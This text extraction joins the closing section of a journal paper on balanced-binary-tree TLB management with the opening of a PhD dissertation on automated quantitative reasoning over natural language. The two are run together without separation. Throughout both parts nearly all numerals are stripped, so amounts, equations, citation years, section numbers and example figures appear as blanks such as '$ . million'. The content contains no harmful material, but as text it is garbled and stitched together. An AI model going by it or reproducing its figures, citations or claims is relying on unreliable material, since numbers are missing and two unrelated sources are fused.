tlb m = memory access time c = tlb access time if the page is not in physical memory, the mmu raises a page fault, and the windows page fault– handling code attempts to locate the page in the system paging file. if the page can be located, it is loaded into physical memory, and the pte is updated to reflect its location. if it cannot be located and the translation is a user mode translation, an access violation occurs because the virtual address references an invalid physical address. if the page cannot be located and the translation is occurring in kernel mode, a bug check(also called a blue screen) occurs. figure . mapping relation viii. conclusion according to the characteristics of the tree, the maximum depth of balanced binary tree with n nodes is log n, and the average search length is approximately log n. international journal of advanced network, monitoring and controls volume , no. , in this paper, our team discuss the software tlb management method based on balanced binary search tree through the abstract model. this management method takes advantage of the advantages of balanced binary search tree in pruning and searching, which can quickly complete the retrieval of virtual page number and physical page . when the tlb expands, the number of tlb failures decreases, and the cost of tree building is shared equally in each search. to a certain extent, it can improve the performance of computer operating system in processing large virtual memory space, accelerate the conversion from virtual address to physical address, and make room for other designs on chip. however, due to the lack of experimental environment and sufficient theoretical knowledge, our team only verify theoretical time compleity by math and statistic, did not test in the actual environment, especially not verify the program model ,which is based on balanced binary search tree, our team did not test reliability under the condition of hardware instability or storage space disorder, like no electrical power and other special circumstances. a reliable software model which can be used in engineering must consider all kinds of special circumstances. stability and reliability is the most important aspect of a software model. balanced binary search tree as the search scheme of this model has the possibility of further optimization. the algorithm designed in the future research should not only consider the running speed, but also consider the difficulty of implementation in practical engineering and the future maintenance work. it is necessary to do further study of complexity of maintenance work and the stability of the software model. engineering and theory are the unity of opposites. theory is the source of engineering. the development of theory needs the support of engineering. references [ ] marin g, mellorcrummey j. cross-architecture performance predictions for scientific applications using parameterized models[c]. measurement and modeling of computer systems, , ( ): - . [ ] boncz p, manegold s, kersten m l, et al. database architecture optimized for the new bottleneck: memory access[c]. very large data bases, : - . [ ] g.m.adelson-velsky,e.m.landis, “an algorithm for the organization of information” ( ): - [ ] deb, kalyanmoy, and ram bhushan agrawal. "simulated binary crossover for continuous search space.." complex systems . [ ] i. s. jacobs and c. p. bean, “fine particles, thin films and exchange anisotropy,” in magnetism, vol. iii, g. t. rado and h. suhl, eds. new york: academic, , pp. – . [ ] m. young, the technical writer’s handbook. mill valley, ca: university science, . [ ] talluri m, hill m d. surpassing the tlb performance of superpages with less operating system support[c]. architectural support for programming languages and operating systems, , ( ): - . [ ] sleator, daniel d., and robert e. tarjan. "self-adjusting binary search trees." journal of the acm . [ ] rajwar r, herlihy m, lai k k, et al. virtualizing transactional memory[c]. international symposium on computer architecture, , ( ): - . [ ] menon a, santos j r, turner y, et al. diagnosing performance overheads in the xen virtual machine environment[c]. virtual execution environments, : - . c© by subhro roy. all rights reserved. reasoning about quantities in natural language by subhro roy dissertation submitted in partial fulfillment of the requirements for the degree of doctor of philosophy in computer science in the graduate college of the university of illinois at urbana-champaign, urbana, illinois doctoral committee: professor dan roth, chair professor gerald dejong associate professor julia hockenmaier associate professor luke zettlemoyer, university of washington abstract quantitative reasoning involves understanding the use of quantities and numeric relations in text, and reasoning with respect to them. it forms an essential part of everyday interaction. however, little work from the natural language processing community has focused on quantitative reasoning. in this thesis, we investigate the challenges in performing automated quantitative reasoning over natural language text. we formulate several tasks to tackle some of the fundamental problems of quantitative reasoning, and address the problem of developing robust statistical methods for these tasks. we show that standard nlp tools are not sufficient to obtain the abstraction needed for quantitative reasoning; the standard nlp pipeline needs to be extended in various ways. we propose several technical ideas for these extensions. we first look at the problem of detecting and normalizing quantities expressed in free form text, and show that correct detection and normalization can support several simple quantitative inferences. we then focus on numeric relation extraction from sentences, and show that several natural properties of language can be leveraged to effectively extract numeric relations from a sentence. we finally investigate the problem of quantitative reasoning over multiple quantities mentioned across several sentences. we develop a decomposition strategy which allows reasoning over pairs of numbers to be combined effectively to perform global reasoning. we also look at the problem of effectively using math domain knowledge in quantitative reasoning. on this front, we first propose graph representations called “unit dependency graphs”, and show that these graph representations can be used to effectively incorporate dimensional analysis knowledge in quantitative reasoning. next, we develop a general framework to incor- porate any declarative knowledge into quantitative reasoning. this framework is used to incorporate several mathematical concepts into textual quantitative reasoning, leading to robust reasoning systems. ii to my mom. iii acknowledgments i consider myself fortunate to have dan as my research advisor. he took me on as a phd student when i was a confused theory deserter with no clue about nlp. he had the most encouraging words about my progress, even when i felt frustrated with the lack of results. he always encouraged me to strive for better results, and understand the bigger picture of the research. he has taught me to not only be a better researcher, but also to be a kind and compassionate human being. i would like to thank my committee members: prof. gerald dejong, prof. julia hockenmaier and prof. luke zettlemoyer, from whom i got valuable feedback on my research. i would also like to thank all my internship mentors and collaborators, namely ming-wei chang, scott yih, hannaneh hajishirzi, rik koncel-kedziorski, mark hopkins, jd chen; i have learnt a lot working with them. special thanks to my friends shyam and john; i will miss our long afternoon walks discussing research among other things. i would like to thank snigdha; her help was instrumental in finishing this thesis on time. i would also like to thank the past and present members of cogcomp, namely daniel, stephen, haoruo, vinod, rajhans, kai-wei, gourab, nitish, colin, shashank (srivastava and gupta), michael, christos, parisa, chen- tse, pavan, yangqiu and mark. they had gifted me an ideal stimulating environment for research. also, special thanks to my friends arka, arun, anish, sangeetha and mainak, who provided me a lot of support in troubled times. finally, i would like to thank my family – my mom, dad and brother. my parents left no stone unturned to provide me the best quality education, in spite of facing lots of hardships themselves to make it possible. this thesis could not have been completed without my family’s encouragement, support and love. i wish my mom was here today to see me graduate. ma, words cannot describe how much i miss you. iv table of contents list of tables . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . viii list of figures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ix chapter introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . motivation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . math word problems: an abstraction for quantitative reasoning . . . . . . . . . . . . . . . . challenges in automated quantitative reasoning . . . . . . . . . . . . . . . . . . . . . . . . . . . variability of natural language text . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . quantity argument detection . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . reasoning about multiple quantities . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . incorporating domain knowledge . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . contributions of the thesis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . overview of the thesis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . chapter background . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . what is a structure? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . structured prediction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . inference in structured models . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . learning structured prediction models . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . structural support vector machines . . . . . . . . . . . . . . . . . . . . . . . . . . . . . discussion and special case . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . structured prediction with latent variables . . . . . . . . . . . . . . . . . . . . . . . . . . . . chapter early work in quantitative reasoning . . . . . . . . . . . . . . . . . . . . . . . . early algebra and arithmetic solvers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . student program . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . other arithmetic word problem solvers . . . . . . . . . . . . . . . . . . . . . . . . . . . solvers for other domains . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . recent advances in statistical solvers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . chapter quantity entailment . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . related work . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . representing quantities . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . extraction of quantities . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . features . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . mapping text segments into qvr . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . extraction of units . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . quantity entailment . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . reasoning framework . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . v . . scope of qe inference . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . experimental study . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . datasets . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . quantity segmentation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . quantity entailment . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . currency range search . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . qualitative analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . chapter equation parsing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . related work . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . the equation parsing task . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . equation parse representation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . projectivity . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . predicting equation parse . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . predicting quantity trigger list . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . predicting variable trigger list . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . predicting equation tree . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . alternatives . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . experimental results . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . dataset . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . equation parsing modules . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . equation parsing results . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . error analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . chapter arithmetic word problems . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . related work . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . expression tree and problem decomposition . . . . . . . . . . . . . . . . . . . . . . . . . . . . mapping problems to expression trees . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . global inference for expression trees . . . . . . . . . . . . . . . . . . . . . . . . . . . . . quantity schema . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . relevance classifier . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . lca operation classifier . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . experimental results . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . datasets . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . relevance classifier . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . lca operation classifier . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . global inference module . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . discussion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . chapter unit dependency graphs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . unit dependency graph . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . learning to predict udgs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . vertex classifier . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . edge classifier . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . constrained inference . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . joint inference with an arithmetic solver . . . . . . . . . . . . . . . . . . . . . . . . . . . . vi . . monotonic expression tree . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . arithmetic word problem solver . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . joint inference . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . consistent rate unit graphs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . experiments . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . dataset . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . data acquisition . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . udg prediction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . solving arithmetic word problems . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . discussion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . chapter mapping to declarative knowledge . . . . . . . . . . . . . . . . . . . . . . . . . . introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . knowledge representation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . transfer . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . dimensional analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . explicit math . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . part-whole relation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . mapping of word problems to declarative knowledge . . . . . . . . . . . . . . . . . . . . . . . . scoring answer derivations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . learning . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . inference . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . model and implementation details . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . supervision . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . features . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . experiments . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . results on existing dataset . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . new dataset creation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . generalization from biased dataset . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . results on the new dataset . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . related work . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . chapter conclusion and future work . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . limitations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . future directions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . commonsense quantitative reasoning . . . . . . . . . . . . . . . . . . . . . . . . . . . . . unified framework for solvers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . automated math tutoring system . . . . . . . . . . . . . . . . . . . . . . . . . . . . . references . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . appendix a lexicon for equation parsing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . appendix b declarative rules for arithmetic word problems . . . . . . . . . . . . . . . . . . . . . . vii list of tables . schemas used in wordpro . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . -fold cross-validation results of segmentation accuracy and time required for segmentation, the columns for runtime have been normalized and expressed as ratios . . . . . . . . . . . . . . results of qe; adding semantics(+sem) consistently improves performance; only . % of entailing quantities can be recovered by simple string matching . . . . . . . . . . . . . . . . . . micro-averaged accuracy in detecting monetary mentions . . . . . . . . . . . . . . . . . . . . . input and output for equation parsing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . summary of notations used in this chapter . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . statistics of dataset . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . performance of quantity trigger list prediction . . . . . . . . . . . . . . . . . . . . . . . . . . performance of variable trigger list prediction . . . . . . . . . . . . . . . . . . . . . . . . . . . performance of equation tree prediction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . performance on equation parsing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . performance of lca operation classifier on the datasets ai , il and cc. . . . . . . . . . . . . performance of relevance classifier on the datasets ai and il. . . . . . . . . . . . . . . . . . . accuracy in correctly solving arithmetic problems. first four rows represent various configu- rations of our system. we achieve state of the art results in both ai and il datasets. . . . . . units of rate quantities . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . performance of system components for predicting vertex and edge labels for unit dependency graphs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . performance in predicting udgs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . performance in solving arithmetic word problems . . . . . . . . . . . . . . . . . . . . . . . . . . examples of problems which unitdep gets correct, but lca++ does not. . . . . . . . . . . . two examples of arithmetic word problems, and derivation of the answer. for each combina- tion, first a knowledge type is chosen, and then a declarative rule from that knowledge type is chosen to infer the operation. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . accuracy in solving arithmetic word problems. all columns except the last report -fold cross validation results. ∗ indicates statistically significant improvement (p = . ) over second highest score in the column. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . pairs of pertubed problems, along with the systems which get them correct . . . . . . . . . . . examples which knowledge gets correct, but unitdep does not. . . . . . . . . . . . . . . . . examples of errors made by knowledge . . . . . . . . . . . . . . . . . . . . . . . . . . . . . viii list of figures . a sentence with its trigger list and equation tree. −r indicates subtraction with order rl. . . . an arithmetic word problem, solution expression and the corresponding expression tree . . . . two different expression trees for the numeric expression ( × ) + − − . the right one is monotonic, whereas the left one is not. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . an arithmetic word problem, its udg, and a tree representation of the solution ( − )/ . several dependencies exist between the udg and the final solution of a problem. here, “ ” and “ ” are connected via same unit edge, hence they can be added or subtracted, “ ” is connected by den unit to the question, indicating that some expression will be divided by “ ” to get the answer’s unit. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . an example arithmetic word problem and its solution, along with the type of domain knowl- edge required to generate each operation of the solution . . . . . . . . . . . . . . . . . . . . . . annotations in our dataset. number list refers to the numbers detected in the problem. the subscripts in the solution indicate the position of the numbers in the number list. . . . . . . . ix chapter introduction . motivation numbers are an integral part of natural language. we use numbers extensively to communicate how hot the weather is, how well our favorite team played in the last game, etc. newspaper articles regularly report statistics to present an objective assessment of a situation, ranging from the number of people killed in a bomb blast, to the amount of money embezzled by a politician. to understand such articles, one often needs to figure out several properties of the numbers used in them, and how these numbers interact with the rest of the story. consider the following sentence taken from a news article in the chicago tribune [chi, ]: emanuel spent $ . million from july until the feb. election and spent an additional $ . million in the following five weeks. in order to understand the sentence, one has to understand the following for each numeric mention: . unit: indicates which object is being referred to. one has to understand which numbers indicate monetary amounts, and which ones indicate date and time, etc. . associated verb: indicates the effect of the number on the world, whether it is indicating the state of an economy, or amount of money in a transaction, etc. in this case, both “ . million” and “ . million” have the verb “spend” associated with it, indicating both are expenditures made by the campaign. . arguments: indicates the entities interacting with the number. for example, for a monetary trans- action, you want to know the recipient and the donor. in the example above, knowing that both “ . million” and “ . million” are expenditures made by emanuel, enables the reader to understand that in total, emanuel spent . million dollars. there is also a need to understand interactions of several numbers mentioned across several sentence in text. consider the following excerpt from a recent news article [syr, ]. local sources told the new arab that a car bomb had targeted a free syria army checkpoint at the refugee camp on the syrian border with jordan, killing two fsa fighters and injuring several others . . .. jordanian border police responded by opening fire on the attacking vehicle killing a child, according to the sources. a car bomb in january killed at least seven people at the same camp. around , people live in the rukban camp . . .. an earlier car bomb attack near the camp, in the hinterland border area on june last year that resulted in the deaths of six jordanian military personnel. in order to report the total number of deaths reported in the article, one has to analyze how the different numbers in the story interact. one has to understand that the number of people living in the camp (“ , ”) is irrelevant for calculating the number of casualties. all numbers stating the number of victims need to be identified from all sentences in the article, like “two fsa fighters”, “a child”, “at least seven people”, etc. finally all such numbers need to be summed up. all these challenges come under the umbrella of quantitative reasoning. in spite of the difficulties involved, human beings are adept at performing quantitative reasoning to understand natural language text. however, this is not true for automated language understanding systems. relatively little work in natural language processing has analyzed the use of quantities in text. even in areas where we have relatively mature solutions, like information retrieval, we fail to deal with quantities; for example, one cannot search the financial media for “transactions in the - million pounds range.” in this dissertation, we investigate the challenges in performing automated quantitative reasoning. we formulate several tasks that we believe to be fundamental to addressing these challenges, and address the problem of developing robust natural language understanding methods for these tasks, using statistical machine learning. . math word problems: an abstraction for quantitative reasoning in this thesis we suggest that the vast majority of quantitative reasoning problems that occur frequently in text can be viewed, as math wold problems that are solved by elementary and middle schools kids. lets look at a simple math word problem which students solve in elementary school. ryan has marbles and blocks. if he shares the marbles among friends, how many marbles does each friend get? even in such a simple quantitative reasoning problem, there are several challenges involving multiple inter- actions among the numbers in the text. one needs to understand that the question asks for the “marbles” each “friend” gets, so the number of “blocks” should have no effect on the answer. one needs to understand the impact of the associated verb “shares”, and that division is needed to calculate the correct answer. note that this bears clear resemblance with the challenges of quantitative reasoning discussed earlier. there are also several advantages in focusing on math word problems. the language in these problems is relatively simple, and requires understanding of a few related concepts. this helps us to focus on quantitative reasoning, without addressing overly complicated nlp issues. these problems are readily available from textbooks and tutoring websites. as a result, developing benchmark datasets is relatively easy. several pieces of work described in this thesis, particularly in the later chapters (chapter , and ), have been evaluated on the ability to automatically solve math word problems. however, the solutions are applicable for general quantitative reasoning problems. . challenges in automated quantitative reasoning building automated systems for quantitative reasoning involves developing an information extraction system which detects key properties of a quantity, as well as developing a reasoning system which captures the interaction of several numbers in text. developing such a system is challenging because of several reasons which we explain and illustrate in the following subsections. . . variability of natural language text an initial step in performing quantitative reasoning is to identify quantities mentioned in natural language text, to understand what they mean and what they refer to. we address this by identifying the quantity and its unit, and representing them in a canonical form. this step is challenging because the same quantity can be expressed in several forms, a problem we refer to as variability. for example, the quantity “$ . million” can be written as “usd . million”, “ dollars”, “ $”. in addition, the same amount of money can be expressed in some other currency unit (like euros). this will require some unit conversion to understand that it refers to the same amount of money. another challenge is the effect of several modifiers on quantities. consider the difference between “more than hours”, “ hours”, and “around hours”. although all three phrases are similar in terms of lexical overlap, they represent different quantity values. in order to capture the difficulties in detecting and normalizing numbers, and their impact on quantitative reasoning, we formulate a new task called quantity entailment (qe). this task draws its motivation from the general recognizing textual entailment (rte) problem [dagan et al., ]. given two sentences t and h, the task of qe is to determine whether a given quantity in h can be inferred from a given text snippet t . an example is shown below. t : a bomb in a hebrew university cafeteria killed five americans and four israelis. h: a bombing at hebrew university in jerusalem killed nine people, including five americans. for this example, the output of qe is that the phrase “nine people” can be implied by the phrase “fives americans and four israelis”. we investigate this task in chapter , and discuss effective solutions to quantity detection and normalization, and ultimately show its effectiveness in determining quantity entailment. . . quantity argument detection to reason with respect to numbers, it is important to extract all information related to it from the sentence. for example, if a number is indicating a transaction, one needs to know the donor and the recipient; if a number represents a relation between two entities, one needs to know what those entities are. consider the following example: emanuel’s campaign contributions total thrice those of his opponents put together. to understand the sentence above, its important to know that “thrice” denotes a relation between “emanuel’s campaign contributions” and “the contributions of his opponents”. often, not all the entities associated with a relation are explicitly mentioned in the sentence; they have to be inferred from the context. consider the following sentence [gun, ]. on an average day this year, americans were killed by guns. here, one needs to use the understanding of “average”, and infer that the relation that is described involves the number of gun violence deaths each day of the year. in order to capture these challenges, we formulate the task of equation parsing. the task takes as input a sentence representing a mathematical relation among at most two entities. the output of equation parsing is an equation which represents the relation expressed in the sentence. in addition to the equation, the output also provides a grounding for the variables in the equation, that is, it provides a mapping of the variables in the equation to text snippets indicating what the variables stand for. we discuss this problem in chapter . . . reasoning about multiple quantities reasoning over multiple quantities often require correct hierarchical composition of numbers with mathe- matical operations, as in the case of the following math word problem: isabel picked flowers for her friends wedding. she was making bouquets with flowers in each one. if of the flowers wilted before the wedding, how many bouquets could she still make? in order to answer this question, needs to be subtracted from , and only then the result needs to be divided by . first, we have to decide the order in which the numbers need to be composed, and second, we have to decide the math operation for each combination. this kind of hierarchical composition poses a challenge for quantitative reasoning. to address this, we introduce novel decomposition strategies in chapters and . our decomposition strategies allow reducing a math word problem with any number of quantities, into simple quantitative reasoning problems over at most two quantities each. we utilize this decomposition to develop a system for automatically solving math word problems like the example above, and achieve state of the art results. . . incorporating domain knowledge domain knowledge often significantly influences the outcome of quantitative reasoning. a key reason humans do very well in quantitative reasoning is that they can easily use their understanding of the world and background knowledge to make inferences. for example, in the math word problem in subsection . . , a child can easily infer that “wilt” should result in subtraction, since no one uses wilted flowers in bouquets. also, since the unit of “ ” is “flowers per bouquet”, it should be used in a division operation. indeed, understanding of verb interaction and rate relationships seem essential to solving the problem. all these indicate that there is a need to effectively integrate domain knowledge into any quantitative reasoning system, which will be the focus of the last part of the thesis. . contributions of the thesis in this thesis, we investigate each of the challenges mentioned above, for automated quantitative reasoning. in particular, we make the following claim: current nlp pipeline is not sufficient to extract an abstraction of text required to perform quantitative reasoning. however quantitative reasoning over text can be facilitated by identifying quantities, units, and integrating domain knowledge about mathematical relations into machine learning methods. to perform quantitative reasoning over multiple quantities, we can decompose the problem into simpler components, where each component is a simpler quantitative reasoning problem over at most two quantities. the primary contributions of the thesis are summarized below: . we propose a statistical approach to quantity detection and normalization based on numbers, units and modifiers. we show that this is an effective approach to support simple quantitative reasoning. . we exemplify the drawbacks of current syntactic and semantic parsers to extract the abstraction need to support quantitative reasoning. . we exploit natural properties of equations to reduce search space, and propose a pipeline architecture to efficiently and effectively predict mathematical relations expressed in a single sentence. . we propose a novel decomposition procedure to support quantitative reasoning over multiple mentions of numbers. we show that this decomposition allows simple reasoning over pairs of quantities to be composed effectively, to perform quantitative reasoning over multiple numbers across several sentences. . we introduce a structure called “unit dependency graphs” to represent the relationships between the units of various numbers in text, and the question you need to answer using that text. we show that unit dependency graphs capture the domain knowledge about unit compatibility and dimensional analysis, and can be effectively used to incorporate such domain knowledge in quantitative reasoning systems. . we propose a framework to integrate any form of declarative knowledge into word problem solving. we show that this declarative knowledge based method learns better models from limited data, as well as, obtains the right abstraction even in the presence of biased data. . overview of the thesis this section provides a guide for the rest of the thesis. the thesis can be broadly categorized into four logical segments. part i: background the first part of this thesis surveys background work in the areas of quantitative reasoning, structured learning and inference. these chapters do not provide exhaustive surveys of these research directions and we will only go over relevant material here and include additional pointers as necessary. a reader familiar with machine learning and structured learning paradigms, can only skim these parts, and focus only on the background work in quantitative reasoning. chapter is devoted to this part. part ii: quantity extraction, normalization and equation parsing this part of the thesis discusses work related to quantities at a mention level or sentence level. we discuss effective approaches to extract and normalize quantities into a standard form. we also show how we can leverage certain natural properties of a sentence to extract mathematical relations between entities in the sentence. the part constitutes two chapters. • chapter discusses our approach to quantity extraction and normalization, and its application to textual entailment problems. • chapter describes methods to analyze mathematical relations described within a single sentence, as well as, extract the relevant entities for the relation. part iii: solving arithmetic word problems this part focuses on quantitative reasoning problems which span across multiple sentences. we found that math word problems form a natural abstraction to the challenges we usually encounter in across sentence quantitative reasoning. as a result, this part will focus on building robust solvers for math word problems. we however do not look at the entire range of word problems, which might require a wide range of background knowledge. we restrict our focus to arithmetic word problems; these are story problems which students solve in elementary school. the answers to these problems can be usually found by combining the numbers in the problem text by simple basic operations. this part constitutes three chapters: • chapter describes a decomposition strategy which is key in applying quantitative reasoning over multiple numbers mentioned across several sentences. we show how this decomposition can be used to develop an end to end arithmetic word problem solver. • chapter introduces a structure called “unit dependency graphs” to capture the relations among the units of different numbers mentioned in text. we show how these graphs can be used to incorporate do- main knowledge about rate relationships, unit compatibility and dimensional analysis to word problem solving and to general quantitative reasoning. • chapter describes a framework to integrate any form of declarative knowledge into a word problem solver. we use the framework to integrate four common forms of domain knowledge for arithmetic word problems. we show that the declarative knowledge helps our system learn more effectively in the presence of limited data. part iv: conclusion the final part of the thesis offers concluding remarks. it summarizes the contributions of this dissertation and identifies directions for future research that can be built on top of this work. this can be found in chapter . chapter background statistical machine learning approaches are widely used in many areas of natural language of processing, in particular, in predicting semantic annotations and linguistic structures. in this chapter, we cover a few basic machine learning concepts which will be used in the rest of the thesis. we mainly focus on structured prediction, since this 